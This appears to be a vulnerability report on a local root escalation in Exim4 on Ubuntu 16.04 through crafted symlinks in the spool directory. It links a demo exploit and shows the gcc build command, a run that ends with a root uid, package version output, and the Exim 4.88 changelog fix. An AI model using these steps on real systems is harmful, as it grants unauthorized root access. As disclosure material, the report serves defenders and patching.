Exim4 follows symlinks in various operations in /var/spool/exim4. By placing crafted symlinks, escalation from user "Debian-exim" to "root" is possible.
See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c for demo. (Keep a copy of "/lib/x86_64-linux-gnu/libpam.so.0.83.1" in case of errors, otherwise you will lock yourself out.)
# pwd
/var/spool/exim4
# /usr/bin/id
uid=106(Debian-exim) gid=112(Debian-exim) groups=112(Debian-exim)
# gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry
# ./EximUpgrade --Upgrade
Relinked /var/spool/exim4/input/1ayy0X-0000O3-HI-J
Target ready for writing
uid=0(root) gid=0(root) groups=0(root),112(Debian-exim)
# ...
$ lsb_release -rd
Description: Ubuntu 16.04 LTS
Release: 16.04
$ apt-cache policy exim4-daemon-light
exim4-daemon-light:
Installed: 4.86.2-2ubuntu2
Candidate: 4.86.2-2ubuntu2
Version table:
*** 4.86.2-2ubuntu2 500
500 http://archive.ubuntu.com/ubuntu xenial/main amd64 Packages
100 /var/lib/dpkg/status
Exim 4.88 changelog:
JH/27 Fix a possible security hole, wherein a process operating with the Exim
UID can gain a root shell. Credit to http://
discovery and writeup. Ubuntu bug 1580454; no bug raised against Exim
itself :(